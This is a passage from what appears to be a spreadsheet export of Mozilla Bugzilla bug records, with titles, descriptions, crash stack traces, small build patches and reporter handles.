JS_CallFunctionValue  [mozilla/js/src/jsapi.c line 4363]
nsJSContext::CallEventHandler  [mozilla/dom/src/base/nsJSEnvironment.cpp line 1493]
nsJSEventListener::HandleEvent  [mozilla/dom/src/events/nsJSEventListener.cpp line 195]
nsEventListenerManager::HandleEventSubType  [mozilla/content/events/src/nsEventListenerManager.cpp line 1655]
nsEventListenerManager::HandleEvent  [mozilla/content/events/src/nsEventListenerManager.cpp line 1762]
nsXULElement::HandleDOMEvent  [mozilla/content/xul/content/src/nsXULElement.cpp line 2234]
PresShell::HandleDOMEventWithTarget  [mozilla/layout/base/nsPresShell.cpp line 6622]
nsButtonBoxFrame::DoMouseClick  [mozilla/layout/xul/base/src/nsButtonBoxFrame.cpp line 181]
nsButtonBoxFrame::MouseClicked  [mozilla/layout/xul/base/src/nsButtonBoxFrame.h line 61]
PresShell::HandleEventInternal  [mozilla/layout/base/nsPresShell.cpp line 6564]
PresShell::HandleEventWithTarget  [mozilla/layout/base/nsPresShell.cpp line 6420]
nsEventStateManager::CheckForAndDispatchClick  [mozilla/content/events/src/nsEventStateManager.cpp line 3207]
nsEventStateManager::PostHandleEvent  [mozilla/content/events/src/nsEventStateManager.cpp line 2170]
PresShell::HandleEventInternal  [mozilla/layout/base/nsPresShell.cpp line 6595]
PresShell::HandleEvent  [mozilla/layout/base/nsPresShell.cpp line 6358]
nsViewManager::HandleEvent  [mozilla/view/src/nsViewManager.cpp line 2566]
nsViewManager::DispatchEvent  [mozilla/view/src/nsViewManager.cpp line 2253]
HandleEvent  [mozilla/view/src/nsView.cpp line 174]
nsWindow::DispatchEvent  [mozilla/widget/src/windows/nsWindow.cpp line 1319]
nsWindow::DispatchMouseEvent  [mozilla/widget/src/windows/nsWindow.cpp line 6329]
ChildWindow::DispatchMouseEvent  [mozilla/widget/src/windows/nsWindow.cpp line 6576]
nsWindow::WindowProc  [mozilla/widget/src/windows/nsWindow.cpp line 1507]</t>
  </si>
  <si>
    <t>NSS-182086</t>
  </si>
  <si>
    <t>ranlib needs to be rerun after static libraries are moved to the destination directory.</t>
  </si>
  <si>
    <t>One difference between Mac OS X and Unix is that on Mac OS X
ranlib needs to be rerun after static libraries are moved to
the destination directory.
In the coreconf build system we need to rerun ranlib on the
*.a files after the 'import' rule unpacks the mdbinary.jar file.</t>
  </si>
  <si>
    <t>CORE-222588</t>
  </si>
  <si>
    <t>Mozilla creates too many threads and seems to never terminate them</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 4.0)
Build Identifier: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.6a) Gecko/20031015
Mozilla creates a lot of threads (more than 50 is not uncommon)
and seems to never terminate them. I was able to generate 90 threads
in 30 minutes just by intensive browsing.
The problem exists in trunk builds (tried with Mozilla/5.0 (Windows
U WinNT4.0 en-US rv:1.6a) Gecko/20031015) and is inexistant in
1.5 branch builds.
The problem is evident while using HTTP proxy (Squid actually).
I didn't try to reproduce it with proxy disabled. It doesn't seem
to be connected with Java or Flash (i have Java disabled and the
pages that cause new threads to be created do not contain Flash
objects).
Reproducible: Always
Steps to Reproduce:
1. Start Mozilla
2. Start monitoring 'Thread count' in Windows Performance Monitor
3. Browse
Actual Results:  
Thread count grows endlessy while browsing (opening new pages) and stabilizes 
when the browser is idle displaying a page. I reached 90 threads in 30 minutes 
of intensive browsing and over 200 (with earlier trunk build) while browsing 
with browser window open for several days.
Expected Results:  
Thread count should fluctuate but not grow endlessy. Mozilla 1.5 tends to keep 
less than 20 threads open.</t>
  </si>
  <si>
    <t>rsokol</t>
  </si>
  <si>
    <t>TESTING-715369</t>
  </si>
  <si>
    <t>Robocop: FennecNativeElement uses getCurrentActivity</t>
  </si>
  <si>
    <t>FennecNativeElement uses the Robotium Solo.getCurrentActivity function. :kats reports that getCurrentActivity provides the wrong activity in his tests on a Galaxy Tab. 
There are reports that getCurrentActivity is not reliable and provides unpredictable results on Honeycomb and ICS. A workaround is discussed here: http://code.google.com/p/robotium/issues/detail?id=179</t>
  </si>
  <si>
    <t>SEAMONKEY-320907</t>
  </si>
  <si>
    <t>Autocomplete popup doesn't close when there are no results</t>
  </si>
  <si>
    <t>bug 124674 folded alwaysOpenPopup into minResultsForPopup but some things (Open Location setting the home page) used the defaults and relied on the alwaysOpenPopup=false preventing the popup.  Since the default minResultsForPopup is 0 these things now always have a popup.  The default should really just be 1 location bar already overrides it.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-517104</t>
  </si>
  <si>
    <t>Fennec not display the input method selector</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Build Identifier: 1.0a3-wm
When soft keyboard is showing the little arrow that allows you to change input method does not appear. This makes it impossible to change to another input keyboard when typing in Fennec.
Reproducible: Always
Steps to Reproduce:
1.Open Fennec
2.Tap on the address bar
Actual Results:  
input select icon does not appear
Expected Results:  
Keyboard appears with the input select icon with it.
Windows Mobile 6
HTC Touch Cruise</t>
  </si>
  <si>
    <t>iam.netdeveloper</t>
  </si>
  <si>
    <t>NSPR-199324</t>
  </si>
  <si>
    <t>Cygwin's uname returns i1586 on Intel Xeon processors.</t>
  </si>
  <si>
    <t>We have a Dell Precision 530 workstation with Intel Xeon 2.2GHz CPUs.
Cygwin's uname -m command returns i1586 on that machine.  In
mozilla/nsprpub/configure.in we have:
1349     case $target_cpu in
1350     i?86)
1351             AC_DEFINE(_X86_)
1352         
1353     alpha)
1354             AC_DEFINE(_ALPHA_)
1355             
1356     mips)
1357             AC_DEFINE(_MIPS_)
1358             
1359     *)
1360             AC_DEFINE(_CPU_ARCH_NOT_DEFINED)
1361             
1362     esac
The ? in i?86 matches exactly one character so
i1586 is handled by the default case and the
wrong macro _CPU_ARCH_NOT_DEFINED is defined.</t>
  </si>
  <si>
    <t>CORE-373572</t>
  </si>
  <si>
    <t>Implement Tile filter</t>
  </si>
  <si>
    <t>Implement feTile filter</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-453135</t>
  </si>
  <si>
    <t>MozillaStageUpload should upload complete mars to latest</t>
  </si>
  <si>
    <t>Bug 426443 made MozillaStageUpload upload complete MARs to dated dirs and if both dated and latest are on the syncCommand() copies them to latest as well. If dated is not on we ignore MARs.
I'd like to get AUS working for SeaMonkey localized builds just pointing to the newest full update all the time so it would be nice to get complete MARs into latest even if we don't upload to dated.</t>
  </si>
  <si>
    <t>CALENDAR-331737</t>
  </si>
  <si>
    <t>About Sunbird menu item appears in two places</t>
  </si>
  <si>
    <t>On the Mac the About Sunbird menuitem appears in two places:
1) under the Sunbird application menu (where it _ought_ to be)
2) under the Help menu (where it shouldn't at least on Mac OS X)</t>
  </si>
  <si>
    <t>SEAMONKEY-363792</t>
  </si>
  <si>
    <t>tabbrowser destructor loops over array that's length of tabpanels rather than length of tabs</t>
  </si>
  <si>
    <t>1. Open a new window
2. Open a new tab
3. Close the first tab
4. Close the window
          for (var i = 0 i &lt; this.mTabListeners.length ++i) {
            this.mPanelContainer.childNodes[i].webProgress.removeProgressListener(this.mTabFilters[i])
Error: uncaught exception: [Exception... Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIWebProgress.removeProgressListener]  nsresult: 0x80004005 (NS_ERROR_FAILURE)  location: JS frame :: chrome://global/content/bindings/tabbrowser.xml ::  :: line 2078  data: no]
I'll have to look at how this should really work.  I'm also curious about the various other loops that loop over listeners.  Do we just have to protect this one with an if (whatever is not null) like most of the rest of the loops?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-468514</t>
  </si>
  <si>
    <t>please mothball old try slaves</t>
  </si>
  <si>
    <t>DNS Nagios.
sm-try1-win32-slave aka try1-win32-slave
sm-try2-win32-slave aka try2-win32-slave
sm-try1-linux-slave aka try1-linux-slave
sm-try2-linux-slave aka try2-linux-slave
These are stopped shut down and nuked from VI.
Thanks!</t>
  </si>
  <si>
    <t>MARKETING-783014</t>
  </si>
  <si>
    <t>Firefox Laptop Sticker</t>
  </si>
  <si>
    <t>We'd like to do laptop stickers to hand out at career fairs.  Do you have any designs handy we could re-use/re-vamp that would be a bit fun for college students?  Something along the lines of the Rock your Firefox sticker.
Or if you have any new ideas that would be great too.</t>
  </si>
  <si>
    <t>tyronflanagan</t>
  </si>
  <si>
    <t>kschlegelmilch</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-453737</t>
  </si>
  <si>
    <t>Release Notes for Camino 2.0b1</t>
  </si>
  <si>
    <t>Coming in the next week or so....</t>
  </si>
  <si>
    <t>FIREFOX-354213</t>
  </si>
  <si>
    <t>Linked-In extension not compatable with Firefox 2</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/firefox/1512</t>
  </si>
  <si>
    <t>MOZILLA.ORG-117547</t>
  </si>
  <si>
    <t>FTP login needs to be more helpful</t>
  </si>
  <si>
    <t>As per discussions on #mozilla 2001-12-31 the FTP README (displayed on login)
could do with simplification and a FAQ reference to try to avoid unneccessary
new-user questions. Suggested revised text (still too long really and I don't
know whether some snipping of the US Export stuff is allowable):
Welcome to ftp.mozilla.org!
This is the main distribution point of software and developer tools
related to the Mozilla project.  For more information see our home
page (http://www.mozilla.org/) Go here to download Netscape Communicator:
	http://home.netscape.com/download/
A list of ftp.mozilla.org's mirror sites can be found at:
	http://www.mozilla.org/mirrors.html
If you have any problems using Mozilla you should first read our FAQs
thoroughly. In particular you should note that many items on this server
(such as RPM builds) are contributed by third parties and are beyond
our direct control.  The FAQ index page is at:
	http://www.mozilla.org/faq.html
This site contains source code that is subject to the U.S. Export 
Administration Regulations and other U.S. law. For more details 
(including information on mirroring) see:
	http://www.mozilla.org/whatever.html
We do not guarantee that any source code or executable code 
available from the mozilla.org domain is Year 2000 compliant.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-99855</t>
  </si>
  <si>
    <t>entering 'foo' goes to www.foo.com but adds http://foo to history</t>
  </si>
  <si>
    <t>Enter foo in the URL bar where foo is cnn sun microsoft whatever. Mozilla
adds the www. and .com and gets there but http://cnn would be added to the URL
bar history.</t>
  </si>
  <si>
    <t>CORE-122597</t>
  </si>
  <si>
    <t>When clearing cache after crash need UI for hang</t>
  </si>
  <si>
    <t>I run NS6.2 for weeks (yes weeks) at a time without it crashing. However when
it does crash the cache is in serious need of cleaning which Necko will do
automagically following a crash. This process will start on the first webpage
you visit and _lock up the product_ for minutes while it cleans up the cache
folder. No UI no indication of what is going on just a hang.
I had to break in with Sampler to see what we were doing. If I was an end user
I'd think Netscape/Mozilla was broken and would toss the product into my trash can.
We really need a UI that explains what is happening.</t>
  </si>
  <si>
    <t>CORE-44857</t>
  </si>
  <si>
    <t>[Patch] Mozilla won't build on Linux/SPARC</t>
  </si>
  <si>
    <t>There's a wrong ifdef in the source which prevents Mozilla to build
on Linux/SPARC systems with gcc. This patch fixes it:
--- xpcom/reflect/xptcall/src/md/unix/xptcstubs_sparc_solaris.cpp
+++ xpcom/reflect/xptcall/src/md/unix/xptcstubs_sparc_solaris.cpp       2000/01/
28 08:22:45
@@ -247 +247 @@
 #include xptcprivate.h
-#ifdef sparc
+#ifdef __sparc__
 extern C nsresult
 PrepareAndDispatch(nsXPTCStubBase* self uint32 methodIndex uint32* args)</t>
  </si>
  <si>
    <t>egger</t>
  </si>
  <si>
    <t>CORE-387703</t>
  </si>
  <si>
    <t>Inconsistent display of ASCII text</t>
  </si>
  <si>
    <t>Currently on Linux the ASCII path takes an Xft fast path which does no kerning but the Unicode textrun construction path always uses Pango. The latter can use kerning while the former never does. This is a problem for reftests among other things.</t>
  </si>
  <si>
    <t>TOOLKIT-390771</t>
  </si>
  <si>
    <t>Want to be able to switch profile</t>
  </si>
  <si>
    <t>I'd like to emulate SeaMonkey's profile switching. My idea is as follows:
1. Register the toolkit profile service even when we're starting normally
2. Switch Profile opens the profile selection dialog with a flag
3. If the dialog is not cancelled then it tries to restart using that profile</t>
  </si>
  <si>
    <t>CALENDAR-242534</t>
  </si>
  <si>
    <t>Event/Tasks with UID/Categories including special characters are not displayed in month and multiweek view</t>
  </si>
  <si>
    <t>Event which UID includes special characters like / (imported events) are not
displayed in month and multiweek views and generates a JS error. 
This is due to unused code and I will send an easy fix.</t>
  </si>
  <si>
    <t>belhaire</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-528739</t>
  </si>
  <si>
    <t>Please create approval-thunderbird3.0.1 attachment flags</t>
  </si>
  <si>
    <t>Please create approval-thunderbird3.0.1 attachment flags in the following products:
Thunderbird MailNews Core Mozilla Messaging.
+ and - should be restricted to the thunderbird-drivers group.
Note that the equivalent blocking/status flags have been requested in bug 528737 as I believe there's extra work to set those up.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-384791</t>
  </si>
  <si>
    <t>[meta-ish] Fix Web Features for 1.6</t>
  </si>
  <si>
    <t>We decided after we added Flashblock that Web Features needed to be redone for 1.6.  Bryan has the Flashblock whitelist all ready to go but we need to free up some space for that button first.
I had suggested before that we remove the tab-focus prefs which will help a bit (anyone who really cares about setting those is someone who can handle setting hidden prefs...).</t>
  </si>
  <si>
    <t>BUGZILLA-254587</t>
  </si>
  <si>
    <t>group description not displayed on delete group confirm page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030630 Galeon/1.3.8
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4) Gecko/20030630 Galeon/1.3.8
The page that confirms the delete of a group has a column named description but
the group description is not displayed below it.
In template/en/default/admin/groups/delete.html.tmpl has the following line
    [% desc FILTER html %]
it should be
    [% description FILTER html %]
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>BUGZILLA-366793</t>
  </si>
  <si>
    <t>Allow whines to be sorted according to the sort order of the saved search</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Bugzilla 2.22.1
In whining mails bugs seem to be always ordered by ID regardless of what was configured in the underlying query used.
We would like to order the queried bugs by importance - which is set (but ignored) in the querys we use to whineatothers.
Is there a way to alter bugzilla's behaviour? Is it a feature? do I have the chance to do the trick myself?
Reproducible: Always
Steps to Reproduce:
1. configure a query setting Sort results by - Importance
2. configure whine to get mailed
3. check sort order in the received mail
Actual Results:  
the bugs are always ordered by their ID.
Expected Results:  
the sort order should reflect the query's configured sorting order.</t>
  </si>
  <si>
    <t>sthuebner</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-185928</t>
  </si>
  <si>
    <t>crashes when messing with the recipient fields in msg compose</t>
  </si>
  <si>
    <t>crashes when messing with the recipient fields in msg compose
valeski wrote:
I'm getting a fair number of crashes when composing mail when messing w/ the
recipient fields) the past two days on the windows xp trunk.
granrose wrote:
My reproducible crash in today's bits is if you reply-all on an email with more
than one addressee then tripleclick the first line and hit the del key it
crashes.  Hit that 4 times today before I learned to stop doing that...
a possible dup of bug #185850 caused by bug #103055?
Here's a stack:
0x00000000
nsEventStateManager::DispatchMouseEvent
[c:/builds/seamonkey/mozilla/content/events/src/nsEventStateManager.cpp line 2416]
nsEventStateManager::GenerateMouseEnterExit
[c:/builds/seamonkey/mozilla/content/events/src/nsEventStateManager.cpp line 2518]
nsEventStateManager::PreHandleEvent
[c:/builds/seamonkey/mozilla/content/events/src/nsEventStateManager.cpp line 377]
PresShell::HandleEventInternal
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp line 6150]
PresShell::HandleEvent
[c:/builds/seamonkey/mozilla/layout/html/base/src/nsPresShell.cpp line 6078]
nsViewManager::HandleEvent
[c:/builds/seamonkey/mozilla/view/src/nsViewManager.cpp line 2209]
nsView::HandleEvent [c:/builds/seamonkey/mozilla/view/src/nsView.cpp line 304]
nsViewManager::DispatchEvent
[c:/builds/seamonkey/mozilla/view/src/nsViewManager.cpp line 1949]
HandleEvent [c:/builds/seamonkey/mozilla/view/src/nsView.cpp line 83]
nsWindow::DispatchEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp line 1120]
nsWindow::DispatchWindowEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp line 1137]
nsWindow::DispatchMouseEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp line 5378]
ChildWindow::DispatchMouseEvent
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp line 5633]
nsWindow::ProcessMessage
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp line 4069]
nsWindow::WindowProc
[c:/builds/seamonkey/mozilla/widget/src/windows/nsWindow.cpp line 1404]
USER32.dll + 0x27ad7 (0x77d67ad7)
USER32.dll + 0x2ccd4 (0x77d6ccd4)
USER32.dll + 0x4455 (0x77d44455)
USER32.dll + 0x95d5 (0x77d495d5)
nsAppShellService::Run
[c:/builds/seamonkey/mozilla/xpfe/appshell/src/nsAppShellService.cpp line 472]
main1 [c:/builds/seamonkey/mozilla/xpfe/bootstrap/nsAppRunner.cpp line 1559]
main [c:/builds/seamonkey/mozilla/xpfe/bootstrap/nsAppRunner.cpp line 1907]
WinMain [c:/builds/seamonkey/mozilla/xpfe/bootstrap/nsAppRunner.cpp line 1927]
WinMainCRTStartup()
kernel32.dll + 0x214c7 (0x77e814c7)</t>
  </si>
  <si>
    <t>CORE-229654</t>
  </si>
  <si>
    <t>{inc}When a hover has a different bottom-border with an auto margin grows with the hover trigger</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031107 Galeon/1.3.11a (Debian package 1.3.11a-1)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5) Gecko/20031107 (Galeon Firebird both show it)
The page consists of a  floated left (so it hasn't a width specified but is
not 100% either). Inside the  there is another div with an auto margin.
When the mouse triggers the hover effect of a link which only changes the
border-bottom width the auto margin grows.
Reproducible: Always
Steps to Reproduce:
1. On the page move the mouse over the link
2. repeat
Actual Results:  
the box grew needless upon displaying the hover effect and doesn't shrink back
afterwards. Repeatedly triggering the hover will make the box grow further.
Expected Results:  
No change in box width.</t>
  </si>
  <si>
    <t>CORE-235895</t>
  </si>
  <si>
    <t>enable the 'sftp' gnomevfs module</t>
  </si>
  <si>
    <t>enable the 'sftp' gnomevfs module.
blizzard mentioned that this module is included in fedora core 2 as a way to
easily browse ones home directory if accessible via ssh.</t>
  </si>
  <si>
    <t>CORE-174189</t>
  </si>
  <si>
    <t>flawfinder warnings in internationalization</t>
  </si>
  <si>
    <t>Heikki ran flawfinder (http://www.dwheeler.com/flawfinder) on Mozilla 1.0.1 
branch.
flawfinder found 5 warnings in internationalization code (4497-4500 4502). Go 
through that list and for each warning:
* If it is false positive comment here why it is not an issue
* If it is a real issue make patch for it here and let's get them checked in
In addition to checking the branch also check the trunk.
4497) intl/locale/src/mac/nsDateTimeFormatMac.cpp:435 [4] (buffer) strcat: does 
not check for buffer overflows. Consider using strncat or strlcat.
4498) intl/locale/src/nsLocaleService.cpp:406 [4] (buffer) strcpy: does not 
check for buffer overflows. Consider using strncpy or strlcpy.
4499) intl/locale/src/nsLocaleService.cpp:462 [4] (buffer) strcpy: does not 
check for buffer overflows. Consider using strncpy or strlcpy.
4500) intl/locale/src/nsLocaleService.cpp:471 [4] (buffer) strcpy: does not 
check for buffer overflows. Consider using strncpy or strlcpy. 
4502) intl/uconv/public/nsICharsetConverterManager.h:121 [4] (buffer) sprintf: 
does not check for buffer overflows. Use snprintf or vsnprintf.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-449474</t>
  </si>
  <si>
    <t>Tracking bug for build and release of Firefox 3.0.2</t>
  </si>
  <si>
    <t>Note: we need to force the update of modules/distribution.js in every update to 3.0.2. This is because some 3.0.1 partner builds shipped with a modified distribution.js to work around issues in that system (bug 441444 possibly also bug 445642 but it's not explicitly noted for 3.0.1 but discussed in bug 441441 for 3.0)</t>
  </si>
  <si>
    <t>CORE-259325</t>
  </si>
  <si>
    <t>build error on OpenBSD</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U OpenBSD i386 en-US rv:1.7) Gecko/20040710 Firefox/0.9.2
Build Identifier: FIREFOX_0_10_RELEASE
It is neither safe nor necessary to include stdbool.h in C++ code on OpenBSD.
Reproducible: Always
Steps to Reproduce:
1. Log into OpenBSD machine
2. cvs -d :pserver:anonymous@cvs-mirror.mozilla.org:/cvsroot \
        co -rFIREFOX_0_10_RELEASE -f mozilla/client.mk
3. cd mozilla
4. gmake -f client.mk
Actual Results:  
compilation died with syntax error on false
Expected Results:  
Index: modules/plugin/base/public/nptypes.h
===================================================================
RCS file: /cvsroot/mozilla/modules/plugin/base/public/nptypes.hv
retrieving revision 3.19.4.4
diff -u -r3.19.4.4 nptypes.h
--- modules/plugin/base/public/nptypes.h        1 Sep 2004 16:59:55 -0000      
3.19.4.4
+++ modules/plugin/base/public/nptypes.h        14 Sep 2004 16:35:37 -0000
@@ -788 +7810 @@
     typedef int bool
   #endif
   #else /* OPENBSD is defined so use its bool */
+  #if !defined(__cplusplus)
     #include 
   #endif
+  #endif
   #else
   /*
    * FreeBSD defines uint32_t and bool.</t>
  </si>
  <si>
    <t>nospam-bugzilla</t>
  </si>
  <si>
    <t>THUNDERBIRD-502702</t>
  </si>
  <si>
    <t>will not download mail automatically</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 Trident/4.0 .NET CLR 2.0.50727 .NET CLR 3.0.04506.648 .NET CLR 3.5.21022 .NET CLR 3.0.4506.2152 .NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20090223 Thunderbird/3.0b2
Settings are for the mail to be downloaded immediately upon start up.  It doesn't do that.  I click on get mail and I get the message that there are no messages on the server.  I then click on the individual account and the mail is downloaded (27 messages in fact this time)
Reproducible: Always
Steps to Reproduce:
1.Open Thunderbird and it happens every time
2.
3.
Expected Results:  
To download mail automatically as settings are set</t>
  </si>
  <si>
    <t>bob.bobbartlett</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-276255</t>
  </si>
  <si>
    <t>Developers page does not work anymore</t>
  </si>
  <si>
    <t>If I go to the developers page https://addons.update.mozilla.org/developers/ I
get a 403 Forbidden page</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-526301</t>
  </si>
  <si>
    <t>Five Years of Firefox</t>
  </si>
  <si>
    <t>[FyFx] Language detection only takes the first component of Accept Language header</t>
  </si>
  <si>
    <t>The language detection in http://viewvc.svn.mozilla.org/vc/projects/fyfx/trunk/index.php?revision=54729&amp;view=markup only takes into account the first component of Accept Language header. 
$lang = explode(- $iso_lang[0])
We should support falling back to other locales than en-US. We could use an existing solution e.g. from mozilla.com:
http://viewvc.svn.mozilla.org/vc/projects/mozilla.com/trunk/includes/prefetch.php?revision=54633&amp;view=markup#l79
http://viewvc.svn.mozilla.org/vc/projects/mozilla.com/trunk/includes/langconfig.inc.php?view=markup</t>
  </si>
  <si>
    <t>CORE-387881</t>
  </si>
  <si>
    <t>Arbitrary code execution by polluting implicit XPCNativeWrapper (using Script object)</t>
  </si>
  <si>
    <t>Does script_compile need the same fix as bug 369211?
This is 1.8/1.8.0 branches only since Script object has been removed on trunk.</t>
  </si>
  <si>
    <t>FIREFOX-369314</t>
  </si>
  <si>
    <t>Trunk install takes over as default browser from a release build</t>
  </si>
  <si>
    <t>If you have the latest Firefox release build set as your default browser and install the latest trunk nightly it takes over as the default browser.  This interferes with the ability to test trunk nightlies without impact to your normal browser usage.
Whatever it is the code in this checkin is trying to fix it should only be doing it if the new version is being installed in the same folder as the previous default browser.</t>
  </si>
  <si>
    <t>TOOLKIT-504638</t>
  </si>
  <si>
    <t>Disable malware protection on Windows CE</t>
  </si>
  <si>
    <t>Created attachment 388965
Patch v.1
Bug 503211 disabled the antiphishing code for Windows CE (for perf reasons) but didn't disable the antimalware code too. The safebrowsing service is still downloading to urlclassifier.sqlite (and presumably doing runtime checks).</t>
  </si>
  <si>
    <t>NSS-432303</t>
  </si>
  <si>
    <t>Replace PKIX_PL_Memcpy with memcpy</t>
  </si>
  <si>
    <t>PKIX_PL_Memcpy is brain dead. 
It offers no advantages over memcpy.  
Eliminate it and replace with memcpy calls.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-447970</t>
  </si>
  <si>
    <t>DevNews site is broken - all URLs to individual stories are a 404</t>
  </si>
  <si>
    <t>Summary pretty much covers it -- links to individual stories are all broken possibly due to upgrading to WP 2.6.  
Example of brokenness: http://developer.mozilla.org/devnews/index.php/2008/07/23/thunderbird-20016-security-and-stability-release-now-available/</t>
  </si>
  <si>
    <t>CORE-737273</t>
  </si>
  <si>
    <t>drag feedback for input with placeholder showing has placeholder color</t>
  </si>
  <si>
    <t>STR:
1. Load attachment 590476.
2. Drag text over the text input control.
Expected results:
Regular caret at drop location.
Actual results
Drag feedback caret is faint.</t>
  </si>
  <si>
    <t>fryn</t>
  </si>
  <si>
    <t>TESTOPIA-399056</t>
  </si>
  <si>
    <t>cloning test plan without copying test plan document puts 0xa0 non-breaking space character in test plan document edit window resulting in UFT encoding error</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5
Build Identifier: 
I cloned a test plan but chose NOT to copy to test plan text.  I then proceded to copy and paste my plan into the editing window.  when I submitted I got the following error:
Software error:
DBD::Pg::db do failed: ERROR:  invalid byte sequence for encoding UTF8: 0xa0
HINT:  This error can also happen if the byte sequence does not match the encoding expected by the server which is controlled by client_encoding.
 [for Statement INSERT INTO test_plan_texts 
              (plan_id plan_text_version who creation_ts plan_text)
              VALUES(?????)] at Bugzilla/Testopia/TestPlan.pm line 334
	Bugzilla::Testopia::TestPlan::store_text('Bugzilla::Testopia::TestPlan=HASH(0xa4e7fd8)' 10 12 '\x{a0}') called at /var/www/virts/bugs/bugs/tr_show_plan.cgi line 359
	main::do_update('Bugzilla::Testopia::TestPlan=HASH(0xa4e7fd8)') called at /var/www/virts/bugs/bugs/tr_show_plan.cgi line 229
For help please send mail to the webmaster (xxxx) giving this error message and the time and date of the error. 
I then used simpler and simpler plans eventually submitting without adding anything (but still opening the edit window) and got the same error.  I then realized that when the edit window opened my cursor was in fact not all the way to the left -- if I backspaced and then submitted things were fine.  poking around a bit I discovered that the character is 0xa0 a non-breaking space and this has caused similar problems with XML parsers and suchlike.  
oddly enough this error does not occur when creating a test plan from scratch even though I see similar behavior with there being a space in the test plan document editing window when I open it (i.e. I can backspace to remove a character).  
Reproducible: Always
Steps to Reproduce:
1.  create a test plan with some minimal text (1 character) in the test plan document 
2.  clone this test plan choosing not to copy the test plan document
3.  click the edit document link to edit the test plan doc
4.  click in the edit window but make NO changes to the doc then click submit
Actual Results:  
error shown above
I am running on top of PostgreSQL if that's relevant.</t>
  </si>
  <si>
    <t>BUGZILLA-254545</t>
  </si>
  <si>
    <t>components don't get updated when selecting products in reports</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7) Gecko/20040707 Firefox/0.8
Select a product in the tabular reports does not update the components. 
Reproducible: Always
Steps to Reproduce:
Click on reports -&gt; tabular.  Then click on a product.  The components don't get
updated. 
The changes in bug #123030 has the doOnSelectProduct() function called in
form.html.tmpl and defined in search-advanced.html.tmpl.
However that breaks report tables/graphs because both search-report-table.html
 and search-report-graph.html now needs to have doOnSelectProduct() locally defined.
I thought moving the doOnSelectProduct() definition into form.html.tmpl would
work but the table/graph templates uses a different syntax.  In fact I don't
think the table/graph templates areloading any .js file (productmenu.js or
productform.js).  Also confused why there is both a productmenu.js and a
productform.js</t>
  </si>
  <si>
    <t>CORE-102133</t>
  </si>
  <si>
    <t>Implement phase=target in XBL</t>
  </si>
  <si>
    <t>Many XBL event handlers compare event.target to this to ensure that the event
was targeted at the XBL widget. Surely that's the point of phase=target? If
not then feel free to resolve this bug as invalid. But if it is then I'll come
up with a patch to change all appropriate handlers.</t>
  </si>
  <si>
    <t>CORE-454647</t>
  </si>
  <si>
    <t>fix test_bug368835.xul tests so that TreeInvalidation returns consistent values for event data.</t>
  </si>
  <si>
    <t>Currently when run stand-alone the event data is expected to be null whereas when run in combination with the other test files event data is 0.</t>
  </si>
  <si>
    <t>BUGZILLA-61634</t>
  </si>
  <si>
    <t>describe Milestone URL in edit products page</t>
  </si>
  <si>
    <t>It would be nice if the description for the target milestone url (on the edit
products page) field was more explicit.  Or if the title linked to a more
complete descption such as URL to a page you create for explaining the target
miletones. Or even as a default to the notargetmilestone.html page.</t>
  </si>
  <si>
    <t>hansoneric</t>
  </si>
  <si>
    <t>SEAMONKEY-118633</t>
  </si>
  <si>
    <t>Active Accessibility: need better failure checks for GetPrimaryFrameFor to avoid some crashes</t>
  </si>
  <si>
    <t>GetPrimaryFrameFor can return a succcess code yet not change the value of the
out parameter.
The correct way to check for errors is this:
nsIFrame *frame = nsnull
GetPrimaryFrameFor(content 
if (frame) {blah}</t>
  </si>
  <si>
    <t>SEAMONKEY-85227</t>
  </si>
  <si>
    <t>Biff does not work on 2nd account when password saved</t>
  </si>
  <si>
    <t>Branch Buildid:  2001060713 on all platforms
